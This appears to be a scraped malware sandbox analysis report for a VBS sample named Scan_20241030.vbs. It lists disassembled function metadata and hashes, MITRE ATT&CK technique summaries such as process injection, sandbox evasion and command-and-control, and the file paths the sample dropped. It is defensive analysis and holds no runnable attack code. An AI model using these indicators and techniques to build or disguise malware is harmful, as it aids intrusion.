Instruction Fuzzy Hash: 9F41EF35B04202ABEB10CE65CC41F56BBA6FF84760F904A1AFC56EB240DB61F946CBD1

Function 3550EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 641936fbebc56f6c9badc7dcadccb41b96e73ef59d01341906f5cbe3c1883ad1
Instruction ID: 0a92c53e56101e12c18bb2b0664fb6ba89b52a1392e99882be1d8d67d2e7dd1b
Opcode Fuzzy Hash: 641936fbebc56f6c9badc7dcadccb41b96e73ef59d01341906f5cbe3c1883ad1
Instruction Fuzzy Hash: 26E1F1B5E04708DFDB25CFA9D980A9DBBF2BF48354F20492AE456E7260DB70A941CF50

Function 355BA4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 355BA577
RtlDebugPrintTimes.NTDLL ref: 355BA62A
RtlDebugPrintTimes.NTDLL ref: 355BA64E
RtlDebugPrintTimes.NTDLL ref: 355BA663

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 96309e97757e1ff43794c865aaa87c6c419c9f023bfae229481e6ef3a5301b58
Instruction ID: a425930acc94f0ff253949ac94de75823bb5185eeb597c6cddc2768322b847fe
Opcode Fuzzy Hash: 96309e97757e1ff43794c865aaa87c6c419c9f023bfae229481e6ef3a5301b58
Instruction Fuzzy Hash: 4E515B75B146129FEF08CE58C4A9A197BF2BB89350B10456DD906DB790DBB4FE41CB80

Function 3555EF40 Relevance: 6.2, APIs: 4, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3555F26D
RtlDebugPrintTimes.NTDLL ref: 3555F292
RtlDebugPrintTimes.NTDLL ref: 3555F324
RtlDebugPrintTimes.NTDLL ref: 3555F378

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 956845b8ce28856cf85da27ad0be9827e46b4c91fde1e9d0aa8592a6dbe937c4
Instruction ID: c33325a3bca2940e2ce336953cfcbabedd3778b5c1c62f41ef3bf011144dc5d3
Opcode Fuzzy Hash: 956845b8ce28856cf85da27ad0be9827e46b4c91fde1e9d0aa8592a6dbe937c4
Instruction Fuzzy Hash: 545123B6E042199FEF08CF95D845ADDBBB1BF48360F55842AE906FB250D774A901CF50

Function 354E59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 35540AA7

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f29fdb63d4be7961dfbc148967063c82e48e09dd81e62a57e84b889be539db21
Instruction ID: 9b3320b05f453adb4fa11b14c156cf4601110d12fa6e01b1059b3088ddaad50d
Opcode Fuzzy Hash: f29fdb63d4be7961dfbc148967063c82e48e09dd81e62a57e84b889be539db21
Instruction Fuzzy Hash: DF324774E04369DFEB29CF64C884BDDBBB1BB09305F0041E9D449A7281DBB4AA85CF91

Function 35527D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 35527E8B

Strings

+, xrefs: 35527DE8
-, xrefs: 35527DDD

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 48c0a48a98f074b55f6d94775783548353be22a34a4d64abfe266c1c6d84994e
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 3A91D375E183169FEB14CF69C881AAEB7B1FF84360F90451AE865E72C0EB30B9418761

Function 35514C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 35514CC3
Flst, xrefs: 35514C96

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 4fa4ac5bd30024871a964395a7cfdb0f45e05a977d4f3d4e84760a4f734c4f92
Instruction ID: 297b84acdebf097b1744e5ca5bb24e008b37d6e665ffa701359091c8dee3937f
Opcode Fuzzy Hash: 4fa4ac5bd30024871a964395a7cfdb0f45e05a977d4f3d4e84760a4f734c4f92
Instruction Fuzzy Hash: EC51AAB5E00248CBEF15CF98D484B59FBF5FF44396F55942ED40A9B250EB70AA85CB80

Function 354DDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354DE040

Strings

0, xrefs: 354DE020
0, xrefs: 354DE00B

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 93493de8928633101b6b5d7a1860583e3d55555633b1bc84d47834141b6f585d
Instruction ID: 7b14e82277ff9fe988f3c0e000cc6290993d30fd5eee367aa5ccf80d475daa39
Opcode Fuzzy Hash: 93493de8928633101b6b5d7a1860583e3d55555633b1bc84d47834141b6f585d
Instruction Fuzzy Hash: 6F417CB2A08705DFD304CF28C494A0AFBE5BB88354F04496EF488DB341D771E906CB96

Function 3557AEB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3557AFA4

Strings

!zL, xrefs: 3557AF41
NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 3557AF2F

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: !zL$NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-3212380146
Opcode ID: e1d37eeff00b7e47100012ba7f7f2d140492e83860e3bb231df0c811e7fd9579
Instruction ID: f4f159674c7e9bcb1120627dd6cca790e3b5a5587e3033fb7c8bd37011c11ed3
Opcode Fuzzy Hash: e1d37eeff00b7e47100012ba7f7f2d140492e83860e3bb231df0c811e7fd9579
Instruction Fuzzy Hash: FF31E2BAA00644AFD701DF64CC40F5AB7B5FB84720F518666F915A7680D735B801CB90

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Scan_20241030.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsx8568.tmp\System.dll

C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

C:\Users\user\assureres\Indiciets237\Impersuadability\Bikses.Gre10

C:\Users\user\assureres\Indiciets237\Impersuadability\Hudeopkber\og-image.jpg

C:\Users\user\assureres\Indiciets237\Impersuadability\Hudeopkber\passifloraceae.fll

C:\Users\user\assureres\Indiciets237\Impersuadability\Opgavehaandteringers.Ple

C:\Users\user\assureres\Indiciets237\Impersuadability\Stvlekngte.uru

C:\Users\user\assureres\Indiciets237\Impersuadability\fonder.skr

C:\Users\user\assureres\Indiciets237\Impersuadability\mutchkins.txt

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Scan_20241030.vbs

Function 00403350 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Function 0040596D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Function 00405D80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 0040612D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Function 00405844 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156
fileCOMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre